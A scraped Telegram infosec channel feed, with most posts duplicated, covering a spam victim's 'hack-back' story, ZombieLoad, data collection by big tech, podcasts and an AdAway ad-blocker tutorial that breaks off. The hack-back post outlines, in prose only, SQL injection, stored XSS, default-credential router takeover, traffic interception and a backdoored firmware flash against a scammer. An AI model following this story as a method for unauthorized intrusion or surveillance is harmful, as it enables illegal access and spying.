A spam victim hacks back.
"I give you the choice to inherit me. You' re getting $10 million." Who is behind this kind of spam? A hacker went on a search and found what he was looking for.
Everything started with a mail that promised to make me rich - again. Someone is seriously ill, has stashed 10 million US dollars abroad and wants me to participate - I'm lucky. This is of course total nonsense and one of millions of spam mails that probably everyone has ever received. Automatically I move the mouse pointer over the delete button - and pause. I've had enough, I'm fed up! This time I get on the number. I wanted to know how the cheater proceeds - and maybe even arrest him.
Careless impostor
After some mail conversation, the scammer lured me to a fake online banking site. From there I was supposed to transfer the assets to my account. That failed of course and the fraudster claimed to get a valid TAN only against the payment of 2500 US dollars. Of course, I thought and took a closer look at the website. I came across a SQL injection gap. With a few targeted SQL commands I was able to read out a database with details of an admin page for a large-scale spam campaign. Practically there was also the access data for the page - Facepalm.
But it gets even better: The campaign website also had a security problem. By means of a cross-site noscripting attack (stored XSS), I was able to infiltrate the first name database field with the instruction to call a Java noscript stored on a server controlled by me into the administration page. Consequently, I changed the access data and laid out a bait: I informed the fraudster that I had control over the site and that the new login data was only available for money. He bit, called the administration panel and reset the data. He loaded the noscript from my server and I could save his IP address.
From the provider to the router
A Whois query for the recorded IP address revealed that it belongs to the South African provider Hitec Sure. A subsequent scan revealed port 666 of the web interface of a TP Link Router. At this point another facepalm was due: The fraudster did not change the router's default access data and I could log in with the username "admin" and the password "admin".
By adjusting the DNS server configuration in the router, I redirected requests and recorded data: From now on I could watch all internet activities of the fraudster in real time. It turned out that the fraudster was constantly scanning for badly secured mail servers. Within ten days, about 750 MBytes of data were collected. I could read the PPPoE access data from the web interface of the router. Who would have thought that: Practically these data worked also in the customer portal of the provider. After I had registered there, I could see the complete name of the connection owner. Since the provider portal does not reveal any address data, the exact place of residence of the swindler was still unclear at this time.
Address search
I happen to have the same TP-Link model as the spammer. As a result, I was able to create and successfully test a suitable alternative firmware in the form of an OpenWRT image. I then pre-configured this with the provider and WLAN access data I had read out and flashed it via the web interface of the fraud router. By default, however, the device refuses to update the firmware via remote maintenance. However, I could handle this with comparatively little effort: In the corresponding input fields, only an HTML attribute set to Disabled prohibited this process. I was able to remove the attribute without any problems and update it remotely.
"I give you the choice to inherit me. You' re getting $10 million." Who is behind this kind of spam? A hacker went on a search and found what he was looking for.
Everything started with a mail that promised to make me rich - again. Someone is seriously ill, has stashed 10 million US dollars abroad and wants me to participate - I'm lucky. This is of course total nonsense and one of millions of spam mails that probably everyone has ever received. Automatically I move the mouse pointer over the delete button - and pause. I've had enough, I'm fed up! This time I get on the number. I wanted to know how the cheater proceeds - and maybe even arrest him.
Careless impostor
After some mail conversation, the scammer lured me to a fake online banking site. From there I was supposed to transfer the assets to my account. That failed of course and the fraudster claimed to get a valid TAN only against the payment of 2500 US dollars. Of course, I thought and took a closer look at the website. I came across a SQL injection gap. With a few targeted SQL commands I was able to read out a database with details of an admin page for a large-scale spam campaign. Practically there was also the access data for the page - Facepalm.
But it gets even better: The campaign website also had a security problem. By means of a cross-site noscripting attack (stored XSS), I was able to infiltrate the first name database field with the instruction to call a Java noscript stored on a server controlled by me into the administration page. Consequently, I changed the access data and laid out a bait: I informed the fraudster that I had control over the site and that the new login data was only available for money. He bit, called the administration panel and reset the data. He loaded the noscript from my server and I could save his IP address.
From the provider to the router
A Whois query for the recorded IP address revealed that it belongs to the South African provider Hitec Sure. A subsequent scan revealed port 666 of the web interface of a TP Link Router. At this point another facepalm was due: The fraudster did not change the router's default access data and I could log in with the username "admin" and the password "admin".
By adjusting the DNS server configuration in the router, I redirected requests and recorded data: From now on I could watch all internet activities of the fraudster in real time. It turned out that the fraudster was constantly scanning for badly secured mail servers. Within ten days, about 750 MBytes of data were collected. I could read the PPPoE access data from the web interface of the router. Who would have thought that: Practically these data worked also in the customer portal of the provider. After I had registered there, I could see the complete name of the connection owner. Since the provider portal does not reveal any address data, the exact place of residence of the swindler was still unclear at this time.
Address search
I happen to have the same TP-Link model as the spammer. As a result, I was able to create and successfully test a suitable alternative firmware in the form of an OpenWRT image. I then pre-configured this with the provider and WLAN access data I had read out and flashed it via the web interface of the fraud router. By default, however, the device refuses to update the firmware via remote maintenance. However, I could handle this with comparatively little effort: In the corresponding input fields, only an HTML attribute set to Disabled prohibited this process. I was able to remove the attribute without any problems and update it remotely.
In addition to the provider data and the WLAN configuration, I also added a DynDNS client and a firewall rule for an SSH server to the image. So I had remote access to the device. Afterwards I could read the MAC address of the router as well as three SSIDs from surrounding networks. With a free test account at the geolocation service provider Combain I got the approximate coordinates of these networks. With this information I could finally limit the location of the fraudster to a certain street in Johannesburg, South Africa. That's what I left it at first and didn't contact the spammer anymore.
Now I sat on a gigantic data heap and did not know so correctly, what I should make with the quite explosive information. Go to the police? Difficult. By my acting I made myself certainly punishable. In the end I decided to send the data via the anonymous mailbox ....... editorial office. In consultation with the editors, we then decided to publish the story anonymously.
https://www.heise.de/ct/artikel/Ein-Spam-Opfer-hackt-zurueck-4416729.html
#spam #mail #victim #hacking
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
Now I sat on a gigantic data heap and did not know so correctly, what I should make with the quite explosive information. Go to the police? Difficult. By my acting I made myself certainly punishable. In the end I decided to send the data via the anonymous mailbox ....... editorial office. In consultation with the editors, we then decided to publish the story anonymously.
https://www.heise.de/ct/artikel/Ein-Spam-Opfer-hackt-zurueck-4416729.html
#spam #mail #victim #hacking
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
This media is not supported in your browser
VIEW IN TELEGRAM
📺 ZombieLoad: Cross Privilege-Boundary Data Leakage
In this scenario, we constantly sample data using ZombieLoad and match leaked values against a list of predefined keywords.
The adversary application prints keywords whenever the victim browser process handles data that matches the list of adversary keywords.
Note that the video shows a browser that runs inside a VM:
ZombieLoad leaks across sibling Hyperthreads regardless of virtual machine boundaries.
📺 https://www.cyberus-technology.de/posts/2019-05-14-zombieload.html
#ZombieLoad #video #podcast #poc
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
In this scenario, we constantly sample data using ZombieLoad and match leaked values against a list of predefined keywords.
The adversary application prints keywords whenever the victim browser process handles data that matches the list of adversary keywords.
Note that the video shows a browser that runs inside a VM:
ZombieLoad leaks across sibling Hyperthreads regardless of virtual machine boundaries.
📺 https://www.cyberus-technology.de/posts/2019-05-14-zombieload.html
#ZombieLoad #video #podcast #poc
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
This media is not supported in your browser
VIEW IN TELEGRAM
📺 San Francisco leaders ban facial recognition tech
San Francisco supervisors today approved a ban on police using facial recognition technology, making it the first city in the U.S. with such a restriction.
📺 https://www.youtube.com/watch?v=2OCR4By38vc
#USA #SanFrancisco #ban #police #facialrecon
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
San Francisco supervisors today approved a ban on police using facial recognition technology, making it the first city in the U.S. with such a restriction.
📺 https://www.youtube.com/watch?v=2OCR4By38vc
#USA #SanFrancisco #ban #police #facialrecon
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
Audio
🎧 Elfin APT group targets Middle East energy sector.
Researchers at Symantec have been tracking an espionage group known as Elfin (aka APT 33) that has targeted dozens of organizations over the past three years, primarily focusing on Saudi Arabia and the United States - See more at: https://www.thecyberwire.com/podcasts/cw-podcasts-rs-2019-05-18.html#.dpuf
📻 #ResearchSaturday #CyberWire #podcast
https://www.thecyberwire.com/podcasts/cw-podcasts-rs-2019-05-18.html
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
Researchers at Symantec have been tracking an espionage group known as Elfin (aka APT 33) that has targeted dozens of organizations over the past three years, primarily focusing on Saudi Arabia and the United States - See more at: https://www.thecyberwire.com/podcasts/cw-podcasts-rs-2019-05-18.html#.dpuf
📻 #ResearchSaturday #CyberWire #podcast
https://www.thecyberwire.com/podcasts/cw-podcasts-rs-2019-05-18.html
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
Data Security - What Google, Facebook and Microsoft really know about you
Google something quickly, then here and there a little like and then order something on the Internet with Cortana: Everyday life for many people, but with every action we willingly reveal our data. How much the internet knows about each of us is frightening.
Google knows everything?
Yes, and much more! And sometimes Google even knows things we don't know ourselves, best example: What Google actually knows about us. Dieter Bohn, editor-in-chief of "The Verge", put it very elegantly: https://twitter.com/backlon/status/1126662189127950336
"Google: our advanced AI algorithms can predict what car you want to rent and then fill out the web form for you. It knows what you want and just does it."
Mark Vang of the World Community Computing Grid, an IBM project where people make their PCs and computing power available to research, added: https://twitter.com/chmod777Mark/status/1127191469880684544
"...also, all that data we have collected and continue to collect will stay right on our servers where we can sell it to anyone... but feel free to "delete" your account at any time..."
If you use a free service, you are the product
But Google is not the only Internet giant that is targeting our data. Microsoft and Facebook, autonomous vehicles and smart homes also collect a lot of data. Why? Because, at least in the case of Facebook, we willingly tell them everything they don't want to know - and because it makes money.
You also want to know what the Internet knows about you? The answer is frightening.
Dylan Curran, privacy advisor for Presearch.org and former advisor to the American Civil Liberties Union (ACLU), has examined the data the big companies have collected about him. These are his findings: https://twitter.com/iamdylancurran/status/977559925680467968
❗️Movement profile
Google keeps track of where you've been in recent weeks, months, and years, when you've been there, and how much time it took you to get from one place to another.
Even if you've disabled geolocalization, Google stores location data from other sources. This includes information such as which W-LAN network you use and search queries on Google Maps.
At https://www.google.com/maps/timeline?pb you can retrieve your own motion profile.
❗️Google knows everything you have ever searched for - and deleted
In addition to your motion profile, Google creates a cross-device personal search profile from all your search queries. This means that even if you delete your search history on a device, the data is still there.
At https://myactivity.google.com/myactivity you can check your activity log and change your activity settings.
❗️Advertisement
Google does not only store data, but also combines them in different ways. You never searched for "How do I lose 10 kg in 2 weeks"? You don't need it either. Google will tell you that you are a woman in your early thirties and have been looking for organic shops in your area.
The combination of location data, gender, age, hobbies (search queries), career, interests, relationship status and approximate weight as well as income leads to a unique marketing profile on the basis of which you receive advertising.
At https://www.google.com/settings/ads/ you can view your advertising profile.
❗️App usage
You use an ad blocker? Google knows. Do you often translate texts? Google knows. You use a Doodle list to plan an international business meeting. Google knows, because it stores all data about apps and extensions you use.
This information includes what apps you use, when and where you use them, how often, how long and with whom you communicate, including who they chat to on Facebook, where that person lives and when you go to sleep.
At https://myaccount.google.com/permissions you can access the apps with access to your account.
❗️Google knows all the YouTube videos you've ever watched
Google stores all the videos you've ever searched and watched on YouTube - even if you closed it after seconds.
Google something quickly, then here and there a little like and then order something on the Internet with Cortana: Everyday life for many people, but with every action we willingly reveal our data. How much the internet knows about each of us is frightening.
Google knows everything?
Yes, and much more! And sometimes Google even knows things we don't know ourselves, best example: What Google actually knows about us. Dieter Bohn, editor-in-chief of "The Verge", put it very elegantly: https://twitter.com/backlon/status/1126662189127950336
"Google: our advanced AI algorithms can predict what car you want to rent and then fill out the web form for you. It knows what you want and just does it."
Mark Vang of the World Community Computing Grid, an IBM project where people make their PCs and computing power available to research, added: https://twitter.com/chmod777Mark/status/1127191469880684544
"...also, all that data we have collected and continue to collect will stay right on our servers where we can sell it to anyone... but feel free to "delete" your account at any time..."
If you use a free service, you are the product
But Google is not the only Internet giant that is targeting our data. Microsoft and Facebook, autonomous vehicles and smart homes also collect a lot of data. Why? Because, at least in the case of Facebook, we willingly tell them everything they don't want to know - and because it makes money.
You also want to know what the Internet knows about you? The answer is frightening.
Dylan Curran, privacy advisor for Presearch.org and former advisor to the American Civil Liberties Union (ACLU), has examined the data the big companies have collected about him. These are his findings: https://twitter.com/iamdylancurran/status/977559925680467968
❗️Movement profile
Google keeps track of where you've been in recent weeks, months, and years, when you've been there, and how much time it took you to get from one place to another.
Even if you've disabled geolocalization, Google stores location data from other sources. This includes information such as which W-LAN network you use and search queries on Google Maps.
At https://www.google.com/maps/timeline?pb you can retrieve your own motion profile.
❗️Google knows everything you have ever searched for - and deleted
In addition to your motion profile, Google creates a cross-device personal search profile from all your search queries. This means that even if you delete your search history on a device, the data is still there.
At https://myactivity.google.com/myactivity you can check your activity log and change your activity settings.
❗️Advertisement
Google does not only store data, but also combines them in different ways. You never searched for "How do I lose 10 kg in 2 weeks"? You don't need it either. Google will tell you that you are a woman in your early thirties and have been looking for organic shops in your area.
The combination of location data, gender, age, hobbies (search queries), career, interests, relationship status and approximate weight as well as income leads to a unique marketing profile on the basis of which you receive advertising.
At https://www.google.com/settings/ads/ you can view your advertising profile.
❗️App usage
You use an ad blocker? Google knows. Do you often translate texts? Google knows. You use a Doodle list to plan an international business meeting. Google knows, because it stores all data about apps and extensions you use.
This information includes what apps you use, when and where you use them, how often, how long and with whom you communicate, including who they chat to on Facebook, where that person lives and when you go to sleep.
At https://myaccount.google.com/permissions you can access the apps with access to your account.
❗️Google knows all the YouTube videos you've ever watched
Google stores all the videos you've ever searched and watched on YouTube - even if you closed it after seconds.
Accordingly, Google knows whether you're about to become a parent, what your political views are, what your religion is, whether you're depressed or even suicidal.
More: https://www.youtube.com/feed/history/search_history
❗️ Three million Word documents data
The good thing about Google is that you can request and view all this data. Dylan Curran did just that and received an archive file of 5.5 GB. That's about three million pages of continuous text.
If you are curious: Under the motto "Your account, your data", at https://takeout.google.com/settings/takeout you can "export a copy of the content from your Google Account if you want to back it up or use it with a service from another provider," says Google.
This data includes all the above information, plus bookmarks, email, contacts, Google Drive files, photos taken with your phone, stores where you bought something, and products you bought on Google.
Plus your calendar, hangout conversations, music, books, groups, websites they created, phones they owned, shared pages, how many steps you took a day - a nearly endless list.
❗️How Google gets your data
Even though you probably don't like that answer: You give your data voluntarily. The Google archive of collected data will show you how.
👉🏼 1. search history
Dylan Curran's search history included more than 90,000 entries, including images he downloaded and websites he visited. Of course, the search history also offers all search queries for websites for the illegal downloading of programs, movies and music, so that these data can be used against you in a court hearing and cause great damage.
👉🏼 2nd calendar
Your calendar reveals more about you than you might want to admit and shows all the appointments you've ever added. It doesn't matter if you finally noticed it or not.
In combination with your location data, Google knows if they were there, when they arrived - and in case of an interview - how your appointment went. If you're on your way back very quickly, you probably didn't get the new dream job.
👉🏼 3rd Google Drive
The Google archive of collected data also includes the entire Google Drive, including any data you deleted a long time ago. Among other things, Dylan found his resume, monthly financial overviews, website program code, and a "permanently deleted" PGP security key he used to lock his emails.
👉🏼 4th Google Fit
Even the small wearables like Smartwatch or Fitnesstracker make a contribution to the data collection frenzy of the big corporations. Although Dylan Curran deleted this data months ago and withdrew all permissions from the apps, he found, in the truest sense of the word, a list of all his steps.
Google Fit had diligently counted all the steps he ever took and when and where he went. Of course also all times of relaxation, yoga or fitness exercises.
👉🏼 5. photos
If you accidentally deleted all your photos, don't worry, Google still has them all - including metadata about when, where, and with what device you took them. Well sorted by year and date, of course.
👉🏼 6. e-mails
If you use Google Mail or Gmail, Google also has all the emails you've ever sent or received. The same applies to all emails you have deleted and those you have never received (because they have been categorized as spam).
👉🏼 7. activity protocol
The activity log again contains thousands of files and could probably tell you exactly how you felt day and second. Due to the abundance of this data, Dylan Curran could only present a brief selection:
Google stores all the ads you've ever seen or clicked on, every app you've opened, installed or searched for, and every webpage you've ever visited.
Every image you searched or saved, every place you searched or clicked, every news item and newspaper article, every video you clicked on, and every search query you've made since your first Google search - whether you have a Google Account or not!
❗️ Data security on Facebook
Facebook also offers the option to download his private data. For Dylan Curran, this file was "only" 600 MB or about 400,000 pages of text.
More: https://www.youtube.com/feed/history/search_history
❗️ Three million Word documents data
The good thing about Google is that you can request and view all this data. Dylan Curran did just that and received an archive file of 5.5 GB. That's about three million pages of continuous text.
If you are curious: Under the motto "Your account, your data", at https://takeout.google.com/settings/takeout you can "export a copy of the content from your Google Account if you want to back it up or use it with a service from another provider," says Google.
This data includes all the above information, plus bookmarks, email, contacts, Google Drive files, photos taken with your phone, stores where you bought something, and products you bought on Google.
Plus your calendar, hangout conversations, music, books, groups, websites they created, phones they owned, shared pages, how many steps you took a day - a nearly endless list.
❗️How Google gets your data
Even though you probably don't like that answer: You give your data voluntarily. The Google archive of collected data will show you how.
👉🏼 1. search history
Dylan Curran's search history included more than 90,000 entries, including images he downloaded and websites he visited. Of course, the search history also offers all search queries for websites for the illegal downloading of programs, movies and music, so that these data can be used against you in a court hearing and cause great damage.
👉🏼 2nd calendar
Your calendar reveals more about you than you might want to admit and shows all the appointments you've ever added. It doesn't matter if you finally noticed it or not.
In combination with your location data, Google knows if they were there, when they arrived - and in case of an interview - how your appointment went. If you're on your way back very quickly, you probably didn't get the new dream job.
👉🏼 3rd Google Drive
The Google archive of collected data also includes the entire Google Drive, including any data you deleted a long time ago. Among other things, Dylan found his resume, monthly financial overviews, website program code, and a "permanently deleted" PGP security key he used to lock his emails.
👉🏼 4th Google Fit
Even the small wearables like Smartwatch or Fitnesstracker make a contribution to the data collection frenzy of the big corporations. Although Dylan Curran deleted this data months ago and withdrew all permissions from the apps, he found, in the truest sense of the word, a list of all his steps.
Google Fit had diligently counted all the steps he ever took and when and where he went. Of course also all times of relaxation, yoga or fitness exercises.
👉🏼 5. photos
If you accidentally deleted all your photos, don't worry, Google still has them all - including metadata about when, where, and with what device you took them. Well sorted by year and date, of course.
👉🏼 6. e-mails
If you use Google Mail or Gmail, Google also has all the emails you've ever sent or received. The same applies to all emails you have deleted and those you have never received (because they have been categorized as spam).
👉🏼 7. activity protocol
The activity log again contains thousands of files and could probably tell you exactly how you felt day and second. Due to the abundance of this data, Dylan Curran could only present a brief selection:
Google stores all the ads you've ever seen or clicked on, every app you've opened, installed or searched for, and every webpage you've ever visited.
Every image you searched or saved, every place you searched or clicked, every news item and newspaper article, every video you clicked on, and every search query you've made since your first Google search - whether you have a Google Account or not!
❗️ Data security on Facebook
Facebook also offers the option to download his private data. For Dylan Curran, this file was "only" 600 MB or about 400,000 pages of text.
It contained all the messages he had ever sent or received, all his phone contacts, and all his voice messages.
In addition, Facebook stores all your (possible) interests based on the posts you have clicked or hidden and - rather pointless to the privacy officer - all the stickers you have ever sent or received.
👉🏼 log
In addition, Facebook - similar to Google - stores all your activity data when you log in. This includes the from where and which device was currently used.
The company also stores data from all apps ever connected to Facebook, so Facebook knows your political views and interests. Facebook may also know that you were single (because you installed/uninstalled Tinder) and had a new smartphone in November.
❗️ Data security is a top priority for Windows 😉
In principle yes, because those who use Windows 10 have countless possibilities to "protect" their privacy. In fact, there are so many that it becomes confusing. Very few people actually take the time to read through all 16 (!) menu items and their respective options and further settings and decide individually. Categorically deactivating all switches neither provides the optimal protection nor the optimal user experience.
Google's new security concept works in a very similar way under the motto: "You have the choice" - except that nobody explains to you what you can actually choose there.
👉🏼 External control of webcam and microphone
The data that Windows stores by default again includes location data, what programs you have installed, when you installed them, and how you use them. In addition: Contacts, email, calendar, call history, text messages, favorite recipes, games, downloads, photos, videos, music, on and offline search history, and even what radio station you're listening to. Plus, Windows has constant access to your cameras and microphones.
But it's also one of the biggest paradoxes of modern society. We would never allow the government to place cameras or microphones in our homes or movement trackers in our clothes in the life of the government, instead we do it voluntarily, because - let's face it - we really want to see this sweet cat video.
Source (german) and more info:
https://www.epochtimes.de/genial/tech/datensicherheit-das-wissen-google-facebook-und-microsoft-wirklich-ueber-sie-a2885439.html
#google #facebook #microsoft #data #privacy #why
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
In addition, Facebook stores all your (possible) interests based on the posts you have clicked or hidden and - rather pointless to the privacy officer - all the stickers you have ever sent or received.
👉🏼 log
In addition, Facebook - similar to Google - stores all your activity data when you log in. This includes the from where and which device was currently used.
The company also stores data from all apps ever connected to Facebook, so Facebook knows your political views and interests. Facebook may also know that you were single (because you installed/uninstalled Tinder) and had a new smartphone in November.
❗️ Data security is a top priority for Windows 😉
In principle yes, because those who use Windows 10 have countless possibilities to "protect" their privacy. In fact, there are so many that it becomes confusing. Very few people actually take the time to read through all 16 (!) menu items and their respective options and further settings and decide individually. Categorically deactivating all switches neither provides the optimal protection nor the optimal user experience.
Google's new security concept works in a very similar way under the motto: "You have the choice" - except that nobody explains to you what you can actually choose there.
👉🏼 External control of webcam and microphone
The data that Windows stores by default again includes location data, what programs you have installed, when you installed them, and how you use them. In addition: Contacts, email, calendar, call history, text messages, favorite recipes, games, downloads, photos, videos, music, on and offline search history, and even what radio station you're listening to. Plus, Windows has constant access to your cameras and microphones.
But it's also one of the biggest paradoxes of modern society. We would never allow the government to place cameras or microphones in our homes or movement trackers in our clothes in the life of the government, instead we do it voluntarily, because - let's face it - we really want to see this sweet cat video.
Source (german) and more info:
https://www.epochtimes.de/genial/tech/datensicherheit-das-wissen-google-facebook-und-microsoft-wirklich-ueber-sie-a2885439.html
#google #facebook #microsoft #data #privacy #why
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
CMOinfographic.pdf
25.8 MB
A Look Back At 25 Years Of Digital Advertising
Advertising has always found a way to adapt to the medium. But the introduction of the “World Wide Web” in 1991 truly changed everything—providing advertisers with an unprecedented opportunity to flex their creative chops. Within a few years, new and entirely different types of ads began to, quite literally, pop up.
PDF:
https://www.cmo.com/content/dam/CMO_Other/articles/CMOinfographic.pdf
Article:
https://www.cmo.com/features/articles/2019/3/19/25-years-of-digital.html#gs.cig5lu
German:
https://news.1rj.ru/str/cRyPtHoN_INFOSEC_DE/3032
#advertising #ads #history #pdf
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
Advertising has always found a way to adapt to the medium. But the introduction of the “World Wide Web” in 1991 truly changed everything—providing advertisers with an unprecedented opportunity to flex their creative chops. Within a few years, new and entirely different types of ads began to, quite literally, pop up.
PDF:
https://www.cmo.com/content/dam/CMO_Other/articles/CMOinfographic.pdf
Article:
https://www.cmo.com/features/articles/2019/3/19/25-years-of-digital.html#gs.cig5lu
German:
https://news.1rj.ru/str/cRyPtHoN_INFOSEC_DE/3032
#advertising #ads #history #pdf
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
Audio
🎧 The CyberWire Daily Podcast - May 20, 2019
Huawei is on the US Entity List, and US exporters have been quick to notice and cut the Shenzhen company off.
Security concerns are now expected to shift to the undersea cable market.
Hacktivism seems to have gone into eclipse. T
he EU enacts a sanctions regime to deter election hacking.
Facebook shutters inauthentic accounts targeting African politics.
Salesforce is restoring service after an unhappy upgrade.
OGuser forum hacked. And don’t worry about a hacker draft.
Jonathan Katz from UMD on encryption for better security at border crossings.
Tamika Smith reports on the Baltimore City government ransomware situation.
📻 The #CyberWire Daily #podcast
https://www.thecyberwire.com/podcasts/cw-podcasts-daily-2019-05-20.html
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
Huawei is on the US Entity List, and US exporters have been quick to notice and cut the Shenzhen company off.
Security concerns are now expected to shift to the undersea cable market.
Hacktivism seems to have gone into eclipse. T
he EU enacts a sanctions regime to deter election hacking.
Facebook shutters inauthentic accounts targeting African politics.
Salesforce is restoring service after an unhappy upgrade.
OGuser forum hacked. And don’t worry about a hacker draft.
Jonathan Katz from UMD on encryption for better security at border crossings.
Tamika Smith reports on the Baltimore City government ransomware situation.
📻 The #CyberWire Daily #podcast
https://www.thecyberwire.com/podcasts/cw-podcasts-daily-2019-05-20.html
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
AdAway: Advertising and tracking blocker - Take back control! (Part 6)
1. data collection frenzy
In the last part of the article series I introduced you to the F-Droid Store, where you can get free and open source apps that don't track you or display advertisements. A general recommendation of the article series "Take back control! is therefore:
💡Get apps only from the F-Droid Store.
However, this advice cannot always be put into practice 1:1. Many users are still dependent on apps from the Play Store or cannot find a viable alternative in the F-Droid Store. Unfortunately, apps from the Google Play Store are not exactly known for their data economy - but rather the opposite. Most apps from the Google Play Store contain third-party software components that display advertisements to the user or track his activity every step of the way. As a normal user, however, you don't have any insight into the app or can't "see" from the outside whether this poses a risk to security and privacy.
Since the apps from the Play Store are often accompanied by a "loss of control", I will introduce you to the AdAway app from the F-Droid Store in this article. With this app, the loss of control can be minimized by putting a stop to the delivery of (harmful) advertising and the outflow of personal data to dubious third-party providers.
2nd AdAway
AdAway is an open source advertising and tracking blocker for Android, which was originally developed by Dominik Schürmann - currently AdAway is developed by Bruce Bujon. Based on filter lists, connections to advertising and tracking networks are redirected to the local device IP address. This redirection prevents the reloading of advertisements or the transmission of (sensitive) data to third parties.
By the way, AdAway cannot be found in the Play Store because Google no longer allows ad blockers - they simply violate Google's business model. Or to put it another way: Google will not tolerate an app that effectively protects your privacy and security by preventing the reloading of (harmful) advertisements and the outflow of personal data.
💡There are several advantages to using AdAway:
Reduction in data consumption:
Opening, connecting and closing (app) connections to servers on the Internet inevitably means that data is sent and received. While this is likely to be a problem for most people in their home WLAN due to a flat rate, the use of mobile data often presents a different picture. AdAway blocks the reloading of advertisements, tracking code and other resources. This saves valuable bandwidth and your mobile data plan is not unnecessarily burdened.
Faster device:
The display of advertisements, the execution of reloaded tracking code and basically every (unnecessary) connection setup costs CPU power. However, if these resources are not recharged or blocked by AdAway, not only will your battery last longer, but your device will also respond faster to your input.
Protection of privacy:
A major disadvantage of the predominantly proprietary apps located in the Google Play Store is the lack of transparency of data processing associated with their proprietary nature. Because with these proprietary apps we don't know and often can't check what they actually do (without our knowledge). However, if AdAway is able to block the majority of (app) connections to trackers and advertising networks, this can have a positive impact on our privacy.
AdAway not only blocks advertisements and trackers in your browser, but also in all apps you have installed on your device.
2.1 Concept | Technical background
Using the example of in-app advertising, I would like to briefly explain how AdAway works technically. Suppose an app developer has integrated an advertising module into his app. The app or the integrated module contacts the address each time the app is started or during runtime:
1. data collection frenzy
In the last part of the article series I introduced you to the F-Droid Store, where you can get free and open source apps that don't track you or display advertisements. A general recommendation of the article series "Take back control! is therefore:
💡Get apps only from the F-Droid Store.
However, this advice cannot always be put into practice 1:1. Many users are still dependent on apps from the Play Store or cannot find a viable alternative in the F-Droid Store. Unfortunately, apps from the Google Play Store are not exactly known for their data economy - but rather the opposite. Most apps from the Google Play Store contain third-party software components that display advertisements to the user or track his activity every step of the way. As a normal user, however, you don't have any insight into the app or can't "see" from the outside whether this poses a risk to security and privacy.
Since the apps from the Play Store are often accompanied by a "loss of control", I will introduce you to the AdAway app from the F-Droid Store in this article. With this app, the loss of control can be minimized by putting a stop to the delivery of (harmful) advertising and the outflow of personal data to dubious third-party providers.
2nd AdAway
AdAway is an open source advertising and tracking blocker for Android, which was originally developed by Dominik Schürmann - currently AdAway is developed by Bruce Bujon. Based on filter lists, connections to advertising and tracking networks are redirected to the local device IP address. This redirection prevents the reloading of advertisements or the transmission of (sensitive) data to third parties.
By the way, AdAway cannot be found in the Play Store because Google no longer allows ad blockers - they simply violate Google's business model. Or to put it another way: Google will not tolerate an app that effectively protects your privacy and security by preventing the reloading of (harmful) advertisements and the outflow of personal data.
💡There are several advantages to using AdAway:
Reduction in data consumption:
Opening, connecting and closing (app) connections to servers on the Internet inevitably means that data is sent and received. While this is likely to be a problem for most people in their home WLAN due to a flat rate, the use of mobile data often presents a different picture. AdAway blocks the reloading of advertisements, tracking code and other resources. This saves valuable bandwidth and your mobile data plan is not unnecessarily burdened.
Faster device:
The display of advertisements, the execution of reloaded tracking code and basically every (unnecessary) connection setup costs CPU power. However, if these resources are not recharged or blocked by AdAway, not only will your battery last longer, but your device will also respond faster to your input.
Protection of privacy:
A major disadvantage of the predominantly proprietary apps located in the Google Play Store is the lack of transparency of data processing associated with their proprietary nature. Because with these proprietary apps we don't know and often can't check what they actually do (without our knowledge). However, if AdAway is able to block the majority of (app) connections to trackers and advertising networks, this can have a positive impact on our privacy.
AdAway not only blocks advertisements and trackers in your browser, but also in all apps you have installed on your device.
2.1 Concept | Technical background
Using the example of in-app advertising, I would like to briefly explain how AdAway works technically. Suppose an app developer has integrated an advertising module into his app. The app or the integrated module contacts the address each time the app is started or during runtime:
werbung.server1.de
However, this domain name must first be translated into an IP address so that the advertisement can then be reloaded from there. This service is provided by the Domain Name System (DNS) - one of the most important services on the Internet that converts domain names into their IP address. Everyone knows the principle behind this: You enter a URI (the domain name) in the browser and this is then translated into the corresponding IP address by a DNS server. Names are easier to remember than IP addresses. Your router therefore usually contains DNS servers from your provider or you have entered your own manually, which then translate the address "werbung.server1.de" into an IP address.AdAway now makes use of this DNS principle. In its memory, AdAway maintains a list of domain names that can either deliver advertisements, track users, or otherwise have a negative impact on security and privacy. Once you have installed AdAway, the DNS query is first compared with the internally stored list. If the address is...
werbung.server1.de
...in the list or if there is a hit, the IP address is not resolved as usual, but your device or app receives the answer: "Not reachable" - the translation into the correct IP address is suppressed by AdAway. The result: The advertisement cannot be reloaded from the actual source or IP address. Instead of the advertisement, the user sees a placeholder or simply nothing. A simple principle that blocks the advertisement before it is delivered - even before it is translated into the IP address.2.2 Installation
